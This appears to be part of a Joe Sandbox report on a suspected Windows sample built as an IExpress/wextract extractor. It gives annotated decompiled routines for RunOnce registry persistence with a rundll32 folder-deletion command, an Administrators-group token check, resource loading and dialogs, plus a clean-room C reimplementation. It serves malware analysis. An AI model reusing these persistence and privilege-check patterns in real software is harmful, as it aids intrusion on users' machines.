• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00FD22A3
• RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 00FD22D8
• memset.MSVCRT ref: 00FD22F5
• GetSystemDirectoryA.KERNEL32 ref: 00FD2305
• RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00FD236E
• RegCloseKey.ADVAPI32(?), ref: 00FD237A
Strings
• Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00FD2299
• rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00FD232D
• C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00FD2321
• wextract_cleanup3, xrefs: 00FD227C, 00FD22CD, 00FD2363
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Value$CloseDirectoryOpenQuerySystemmemset
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
• API String ID: 3027380567-1707933020
• Opcode ID: 5e02fa865a74b0f25d366f4fd99bbbc9cca1608c196484b74a40b74557511fad
• Instruction ID: ea77913d49f1b7e8accb2c8f7307aabb5c675ae7e3cf505cbde678c177faef68
• Opcode Fuzzy Hash: 5e02fa865a74b0f25d366f4fd99bbbc9cca1608c196484b74a40b74557511fad
• Instruction Fuzzy Hash: B0312931A0021C6BCB219B60DC49FDA7B7EEF14350F0801E7F50DE6140EA75AF89EA90
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 87%
			/* Decompiled dialog procedure (decompiler names kept as-is):
			   _a4 = hWnd, _a8 = uMsg, _a12 = wParam. Message checks are done by
			   successive subtraction from 0xf, so the constants below are:
			   0x0f = WM_PAINT, 0x10 = WM_CLOSE, 0x110 = WM_INITDIALOG, 0x111 = WM_COMMAND. */
			E00FD3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					/* WM_PAINT: on the first paint only (flag at 0xfd8590), send
					   EM_SETSEL (0xb1) with start = -1 to control 0x834, which clears
					   any text selection in that control. */
					if( *0xfd8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0xfd8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					/* WM_CLOSE: close the dialog with result 0. The decompiler shows
					   the pushed argument separately; "??" in EndDialog is that value
					   (0 from L7, 1 from the _push(1) path below). */
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					/* WM_INITDIALOG: call helper E00FD43D0 with the desktop window
					   (its purpose is not recovered here), set the text of control
					   0x834 from the string pointer at 0xfd8d4c, set the window title
					   to "nst0dum", bring the dialog to the foreground, then subclass
					   control 0x834: the original window procedure is saved at
					   0xfd88b8 and E00FD30C0 is installed via GWL_WNDPROC (0xfffffffc). */
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E00FD43D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0xfd8d4c);
					SetWindowTextA(_t33, "nst0dum");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0xfd88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E00FD30C0);
					return 1;
				}
				if(_t15 != 1) {
					/* Any other message: not handled. */
					goto L13;
				}
				/* WM_COMMAND: wParam 6 = IDYES ends the dialog with 1,
				   7 = IDNO ends it with 0, anything else is ignored. */
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

APIs
• EndDialog.USER32(?,00000000), ref: 00FD313B
• GetDesktopWindow.USER32 ref: 00FD314B
• SetDlgItemTextA.USER32(?,00000834), ref: 00FD316A
• SetWindowTextA.USER32(?,nst0dum), ref: 00FD3176
• SetForegroundWindow.USER32(?), ref: 00FD317D
• GetDlgItem.USER32(?,00000834), ref: 00FD3185
• GetWindowLongA.USER32(00000000,000000FC), ref: 00FD3190
• SetWindowLongA.USER32(00000000,000000FC,00FD30C0), ref: 00FD31A3
• SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00FD31CA
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
• String ID: nst0dum
• API String ID: 3785188418-432003757
• Opcode ID: d459e7ede6f7eb3bd8e525efab923770dcf8a801bb61fef5391b136d9ec04d79
• Instruction ID: a2a5d442067bef276bafa769186b17958fad10fccfca955c978703e9bf96467c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d459e7ede6f7eb3bd8e525efab923770dcf8a801bb61fef5391b136d9ec04d79
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D11E73290611ABBDB115F74AC0CB5A3B67EB46731F140213FA11D22E0DB709641FB4B
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 91%
/* Decompiler output (Joe Sandbox). Comments and the three missing
 * declarations (_t15, _t25, _t51) were added for readability; the
 * logic is unchanged. The routine answers "is the current process
 * running as a member of BUILTIN\Administrators?" by walking the
 * token's group list, and caches the answer in the global at 0xfd8128. */
E00FD18A3(void* __edx, void* __esi) {
	signed int _v8;                          // stack cookie
	short _v12;                              // high bytes of the identifier authority
	struct _SID_IDENTIFIER_AUTHORITY _v16;   // {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY
	char _v20;                               // result: 1 if Administrators SID is present in the token
	long _v24;                               // TOKEN_GROUPS buffer size (in/out)
	void* _v28;                              // current process token handle
	void* _v32;                              // SID S-1-5-32-544 (BUILTIN\Administrators)
	void* __ebx;
	void* __edi;
	int _t15;                                // added: used below but not declared by the decompiler
	signed int _t23;
	signed int _t25;                         // added: cached-state flag read from 0xfd8128
	long _t45;                               // index into TOKEN_GROUPS.Groups[]
	void* _t49;
	int _t50;                                // 2 = TokenGroups (TOKEN_INFORMATION_CLASS), reused as a cursor
	void* _t51;                              // added: saved __esi
	void* _t52;                              // TOKEN_GROUPS buffer
	signed int _t53;

	_t51 = __esi;
	_t49 = __edx;
	_t23 =  *0xfd8004; // 0x42de454f  security cookie
	_v8 = _t23 ^ _t53;
	_t25 =  *0xfd8128; // 0x2  -> 2 means "not yet evaluated"
	_t45 = 0;
	_v12 = 0x500;      // bytes 00 05: completes SECURITY_NT_AUTHORITY in _v16
	_t50 = 2;          // TokenGroups
	_v16.Value = 0;
	_v20 = 0;
	if(_t25 != _t50) {
		// Result already cached: return without re-querying the token.
		L20:
		return E00FD6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51); // cookie check + return
	}
	// First attempt via the helper at 00FD17EE (it loads advapi32.dll, see APIs list below).
	if(E00FD17EE( &_v20) != 0) {
		_t25 = _v20;
		if(_v20 != 0) {
			 *0xfd8128 = 1;  // mark as evaluated
		}
		goto L20;
	}
	// Fallback: inspect the token groups directly. 8 = TOKEN_QUERY.
	if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
		goto L20;
	}
	// Size query: expected to fail with 0x7a = ERROR_INSUFFICIENT_BUFFER.
	if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
		L17:
		CloseHandle(_v28);
		_t25 = _v20;
		goto L20;
	} else {
		_push(__esi);
		_t52 = LocalAlloc(0, _v24);
		if(_t52 == 0) {
			L16:
			_pop(_t51);
			goto L17;
		}
		// Fetch TOKEN_GROUPS and build S-1-5-32-544:
		// 0x20 = SECURITY_BUILTIN_DOMAIN_RID, 0x220 = DOMAIN_ALIAS_RID_ADMINS.
		if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
			L15:
			LocalFree(_t52);
			goto L16;
		} else {
			if( *_t52 <= 0) {  // TOKEN_GROUPS.GroupCount
				L14:
				FreeSid(_v32);
				goto L15;
			}
			_t15 = _t52 + 4; // 0x4  -> &Groups[0].Sid
			_t50 = _t15;
			// Compare every group SID (SID_AND_ATTRIBUTES is 8 bytes) against Administrators.
			while(EqualSid( *_t50, _v32) == 0) {
				_t45 = _t45 + 1;
				_t50 = _t50 + 8;
				if(_t45 <  *_t52) {
					continue;
				}
				goto L14;
			}
			 *0xfd8128 = 1;  // evaluated
			_v20 = 1;        // process is a member of Administrators
			goto L14;
		}
	}
}

APIs
  • Part of subcall function 00FD17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00FD18DD), ref: 00FD181A
  • Part of subcall function 00FD17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00FD182C
  • Part of subcall function 00FD17EE: AllocateAndInitializeSid.ADVAPI32(00FD18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FD18DD), ref: 00FD1855
  • Part of subcall function 00FD17EE: FreeSid.ADVAPI32(?,?,?,?,00FD18DD), ref: 00FD1883
  • Part of subcall function 00FD17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00FD18DD), ref: 00FD188A
• GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00FD18EB
• OpenProcessToken.ADVAPI32(00000000), ref: 00FD18F2
• GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00FD190A
• GetLastError.KERNEL32 ref: 00FD1918
• LocalAlloc.KERNEL32(00000000,?,?), ref: 00FD192C
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00FD1944
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FD1964
• EqualSid.ADVAPI32(00000004,?), ref: 00FD197A
• FreeSid.ADVAPI32(?), ref: 00FD199C
• LocalFree.KERNEL32(00000000), ref: 00FD19A3
• CloseHandle.KERNEL32(?), ref: 00FD19AD
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
• String ID:
• API String ID: 2168512254-0
• Opcode ID: 3db54a283bcd54c9ff01ac613d44cf9613adf741071bd56e2c8b719be7c8fda8
• Instruction ID: 04fd806a3cd279619bfae7bc7538c494c5b4315b20df07a936ab9dcd5cb5ca16
• Opcode Fuzzy Hash: 3db54a283bcd54c9ff01ac613d44cf9613adf741071bd56e2c8b719be7c8fda8
• Instruction Fuzzy Hash: 73316D71E01209BFDB209FB5DC58AAFBBBEFF04350F140426E541D2254D7309905EB26
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%
E00FD468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
	long _t4;
	void* _t11;
	CHAR* _t14;
	void* _t15;
	long _t16;

	_t14 = __ecx;
	_t11 = __edx;
	_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
	_t16 = _t4;
	if(_t16 <= _a4 && _t11 != 0) {
		if(_t16 == 0) {
			L5:
			return 0;
		}
		_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
		if(_t15 == 0) {
			goto L5;
		}
		__imp__memcpy_s(_t11, _a4, _t15, _t16);
		FreeResource(_t15);
		return _t16;
	}
	return _t4;
}

Instruction addresses: 0x00fd4699 0x00fd469b 0x00fd46a9 0x00fd46af 0x00fd46b4 0x00fd46bc 0x00fd46f9 0x00000000 0x00fd46f9 0x00fd46d9 0x00fd46dd 0x00000000 0x00000000 0x00fd46e5 0x00fd46ef 0x00000000 0x00fd46f5 0x00fd46ff

APIs
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
• SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
• LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
• LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
• memcpy_s.MSVCRT ref: 00FD46E5
• FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
• String ID: TITLE$nst0dum
• API String ID: 3370778649-1250357435
• Opcode ID: 3f32d7b5ca52ae394c100a7963f5983e3e1be8784059edde766b7e5f54583b7a
• Instruction ID: 26e7f3a892616ea3b990f980060958ef5331cf29a51e8d27d6f4931438d1a437
• Opcode Fuzzy Hash: 3f32d7b5ca52ae394c100a7963f5983e3e1be8784059edde766b7e5f54583b7a
• Instruction Fuzzy Hash: A401F9326452087BE31017B55C0DF2B7F2EDBC6F62F084116FB4A87280C971D840A6BA
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 57%
E00FD17EE(intOrPtr* __ecx) {
	signed int _v8;
	short _v12;
	struct _SID_IDENTIFIER_AUTHORITY _v16;
	_Unknown_base(*)()* _v20;
	void* _v24;
	intOrPtr* _v28;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t14;
	_Unknown_base(*)()* _t20;
	long _t28;
	void* _t35;
	struct HINSTANCE__* _t36;
	signed int _t38;
	intOrPtr* _t39;

	_t14 =  *0xfd8004; // 0x42de454f
	_v8 = _t14 ^ _t38;
	_v12 = 0x500;
	_t37 = __ecx;
	_v16.Value = 0;
	_v28 = __ecx;
	_t28 = 0;
	_t36 = LoadLibraryA("advapi32.dll");
	if(_t36 != 0) {
		_t20 = GetProcAddress(_t36, "CheckTokenMembership");
		_v20 = _t20;
                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                    						 *_t37 = 0;
                                                                                                                                                                                                    						_t28 = 1;
                                                                                                                                                                                                    						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                    							_t37 = _t39;
                                                                                                                                                                                                    							 *0xfda288(0, _v24, _v28);
                                                                                                                                                                                                    							_v20();
                                                                                                                                                                                                    							if(_t39 != _t39) {
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							FreeSid(_v24);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t36);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                    			}

APIs
• LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00FD18DD), ref: 00FD181A
• GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00FD182C
• AllocateAndInitializeSid.ADVAPI32(00FD18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FD18DD), ref: 00FD1855
• FreeSid.ADVAPI32(?,?,?,?,00FD18DD), ref: 00FD1883
• FreeLibrary.KERNEL32(00000000,?,?,?,00FD18DD), ref: 00FD188A
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: FreeLibrary$AddressAllocateInitializeLoadProc
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 4204503880-1888249752
• Opcode ID: 7bc75770bedec5e94ecd846ec99bcc41e90950b331d34faacb2cb9591f832948
• Instruction ID: 4148cda4b77c450ad580f5f4bdf2d52805e55592984bbe2a78285a98688ead39
• Opcode Fuzzy Hash: 7bc75770bedec5e94ecd846ec99bcc41e90950b331d34faacb2cb9591f832948
• Instruction Fuzzy Hash: AE118131E01209ABDB109FB4EC49ABEBB7AFF44711F14016BF901E2390DA308D00AB95
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Dialog procedure: _a4 = hwnd, _a8 = message, _a12 = wParam (control/button id).
			E00FD3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) { // WM_CLOSE (0x10): close with IDCANCEL
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) { // WM_INITDIALOG (0x110): center, set title and prompt text, bring to front
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E00FD43D0(_t24, _t12);
					SetWindowTextA(_t24, "nst0dum");
					SetDlgItemTextA(_t24, 0x838,  *0xfd9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) { // WM_COMMAND (0x111)
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) { // IDYES (6) / IDNO (7): return the button id as the dialog result
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0xfd91dc = 1; // control 0x839 pressed: set a global flag, then end the dialog with it
					goto L8;
				}
				return 0;
			}

APIs
• EndDialog.USER32(?,?), ref: 00FD3490
• GetDesktopWindow.USER32 ref: 00FD349A
• SetWindowTextA.USER32(?,nst0dum), ref: 00FD34B2
• SetDlgItemTextA.USER32(?,00000838), ref: 00FD34C4
• SetForegroundWindow.USER32(?), ref: 00FD34CB
• EndDialog.USER32(?,00000002), ref: 00FD34D8
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Window$DialogText$DesktopForegroundItem
• String ID: nst0dum
• API String ID: 852535152-432003757
• Opcode ID: 1d220d4036b95c5e5bd048283e487c388eb6742a700c8d8ab2a45331dc57ea16
• Instruction ID: d5ab9aa587831e56d1c0e88561e3a7c186e8d35ebd83c2008a4e908dbc71903d
• Opcode Fuzzy Hash: 1d220d4036b95c5e5bd048283e487c388eb6742a700c8d8ab2a45331dc57ea16
• Instruction Fuzzy Hash: 7D01F532641128ABC7169F74EC0C96E3B23EB06710F084013FA06837A0C7798F41FB86
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
/* Decompiled string-template expansion. Walks the NUL-terminated template at __ecx and
   copies it to the output buffer _a4, expanding these escape sequences:
     #D  -> directory of the running module (GetModuleFileNameA result with the file name
            removed and a trailing '\' stripped via CharPrevA)
     #E  -> full path of the running module
     ##  -> a literal '#'
   Any other "#X" pair is dropped: the '#' already stored at *_t65 is overwritten by the
   next copied byte because _t65 is not advanced. IsDBCSLeadByte/CharNextA keep
   double-byte characters intact. E00FD65E8, E00FD17C8 and E00FD1680 are not resolved in
   this report; from their use they appear to strip the file name from the path buffer,
   compute the remaining output space, and perform a bounded copy. Because #D edits
   _v268 in place, a #E that follows a #D in the same template receives the directory,
   not the full module path. */
E00FD2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
	signed int _v8;
	char _v268;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t16;
	int _t21;
	char _t32;
	intOrPtr _t34;
	char* _t38;
	char _t42;
	char* _t44;
	CHAR* _t52;
	intOrPtr* _t55;
	CHAR* _t59;
	void* _t62;
	CHAR* _t64;
	CHAR* _t65;
	signed int _t66;

	_t60 = __edx;
	_t16 =  *0xfd8004; // 0x42de454f, likely the /GS security cookie
	_t17 = _t16 ^ _t66;
	_v8 = _t16 ^ _t66; // stack cookie, verified by E00FD6CE0 on return
	_t65 = _a4;
	_t44 = __edx;
	_t64 = __ecx;
	if( *((char*)(__ecx)) != 0) {
		GetModuleFileNameA( *0xfd9a3c,  &_v268, 0x104); // _v268 is 0x104 (MAX_PATH) bytes
		while(1) {
			_t17 =  *_t64;
			if(_t17 == 0) {
				break;
			}
			_t21 = IsDBCSLeadByte(_t17);
			 *_t65 =  *_t64;
			if(_t21 != 0) {
				_t65[1] = _t64[1]; // copy the trail byte of a double-byte character
			}
			if( *_t64 != 0x23) { // 0x23 == '#'
				L19:
				_t65 = CharNextA(_t65);
			} else {
				_t64 = CharNextA(_t64);
				if(CharUpperA( *_t64) != 0x44) { // 0x44 == 'D'
					if(CharUpperA( *_t64) != 0x45) { // 0x45 == 'E'
						if( *_t64 == 0x23) { // "##" -> keep the single '#' already copied
							goto L19;
						}
					} else {
						// "#E": copy the full module path into the output
						E00FD1680(_t65, E00FD17C8(_t44, _t65),  &_v268);
						_t52 = _t65;
						_t14 =  &(_t52[1]); // 0x2
						_t60 = _t14;
						do { // strlen of what was just written
							_t32 =  *_t52;
							_t52 =  &(_t52[1]);
						} while (_t32 != 0);
						goto L17;
					}
				} else {
					// "#D": reduce _v268 to the module directory, then copy it
					E00FD65E8( &_v268);
					_t55 =  &_v268;
					_t62 = _t55 + 1;
					do { // strlen(_v268)
						_t34 =  *_t55;
						_t55 = _t55 + 1;
					} while (_t34 != 0);
					_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
					if(_t38 != 0 &&  *_t38 == 0x5c) { // 0x5c == '\\': strip trailing backslash
						 *_t38 = 0;
					}
					E00FD1680(_t65, E00FD17C8(_t44, _t65),  &_v268);
					_t59 = _t65;
					_t12 =  &(_t59[1]); // 0x2
					_t60 = _t12;
					do { // strlen of what was just written
						_t42 =  *_t59;
						_t59 =  &(_t59[1]);
					} while (_t42 != 0);
					L17:
					_t65 =  &(_t65[_t52 - _t60]); // advance output past the expansion
				}
			}
			_t64 = CharNextA(_t64);
		}
		 *_t65 = _t17; // NUL-terminate the output
	}
	return E00FD6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65); // stack cookie check
}
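The escape handling read off the decompiled routine above, as a clean-room reimplementation added for illustration (this is not the sample's code and not a Joe Sandbox artifact). It takes the module path as an argument instead of calling GetModuleFileNameA so it runs off-Windows, handles ASCII only (the IsDBCSLeadByte/CharNextA handling is omitted), and replaces the unresolved helpers E00FD17C8/E00FD1680 with an explicit bounded copy that fails instead of overrunning the output buffer. The in-place edit of the path buffer by #D is deliberately not reproduced, so #E always yields the full path. The sample path in main() is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Append src at out[*pos] without exceeding out_size (one byte reserved for NUL).
   Returns 1 on success, 0 if the text does not fit. Stands in for the unresolved
   E00FD17C8/E00FD1680 pair, assumed to be a remaining-space calculation and bounded copy. */
static int append_bounded(char *out, size_t out_size, size_t *pos, const char *src)
{
    size_t n = strlen(src);
    if (*pos + n >= out_size)
        return 0;
    memcpy(out + *pos, src, n);
    *pos += n;
    return 1;
}

/* Expand tmpl into out (out_size bytes). Escapes, as in the decompiled routine:
     #D -> directory of module_path without trailing '\'   #E -> module_path
     ## -> '#'                                              #X -> dropped (any other X)
   A trailing '#' is dropped. Case of D/E is ignored (CharUpperA in the original).
   Returns the number of bytes written, or -1 if the output buffer is too small. */
int expand_template(const char *tmpl, const char *module_path, char *out, size_t out_size)
{
    char dir[260];                       /* mirrors the 0x104-byte _v268 buffer */
    size_t pos = 0;
    const char *last_sep;
    const char *p;

    if (out_size == 0)
        return -1;

    /* Directory part: everything before the last backslash, which also removes the
       trailing '\' that the original strips via CharPrevA. */
    last_sep = strrchr(module_path, '\\');
    if (last_sep) {
        size_t dlen = (size_t)(last_sep - module_path);
        if (dlen >= sizeof dir)
            return -1;
        memcpy(dir, module_path, dlen);
        dir[dlen] = '\0';
    } else {
        dir[0] = '\0';
    }

    for (p = tmpl; *p; p++) {
        if (*p != '#') {
            if (pos + 1 >= out_size)
                return -1;
            out[pos++] = *p;
            continue;
        }
        p++;                             /* byte after the '#' */
        if (*p == '\0')
            break;                       /* template ends in '#': dropped */
        switch (*p) {
        case 'D': case 'd':
            if (!append_bounded(out, out_size, &pos, dir)) return -1;
            break;
        case 'E': case 'e':
            if (!append_bounded(out, out_size, &pos, module_path)) return -1;
            break;
        case '#':
            if (pos + 1 >= out_size) return -1;
            out[pos++] = '#';
            break;
        default:
            break;                       /* unknown escape: '#' and X both dropped */
        }
    }
    out[pos] = '\0';
    return (int)pos;
}

/* Helper: expand and compare with an expected string. Returns 1 on match. */
int expand_matches(const char *tmpl, const char *module_path, const char *expected)
{
    char buf[512];
    if (expand_template(tmpl, module_path, buf, sizeof buf) < 0)
        return 0;
    return strcmp(buf, expected) == 0;
}

/* Helper: return code when the output buffer is limited to out_size bytes (max 512). */
int expand_rc_limited(const char *tmpl, const char *module_path, size_t out_size)
{
    char buf[512];
    if (out_size > sizeof buf)
        out_size = sizeof buf;
    return expand_template(tmpl, module_path, buf, out_size);
}

int main(void)
{
    char buf[512];
    const char *exe = "C:\\Users\\user\\Desktop\\file.exe";   /* constructed sample path */
    expand_template("#D\\plugin.dll", exe, buf, sizeof buf);
    printf("%s\n", buf);
    expand_template("running #E (100## done) #Z", exe, buf, sizeof buf);
    printf("%s\n", buf);
    return 0;
}
```

When hunting for this routine in other samples, the distinguishing features are the '#'-prefixed two-byte escapes, the CharPrevA backslash strip, and the reuse of a single MAX_PATH stack buffer for both the #D and #E expansions.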

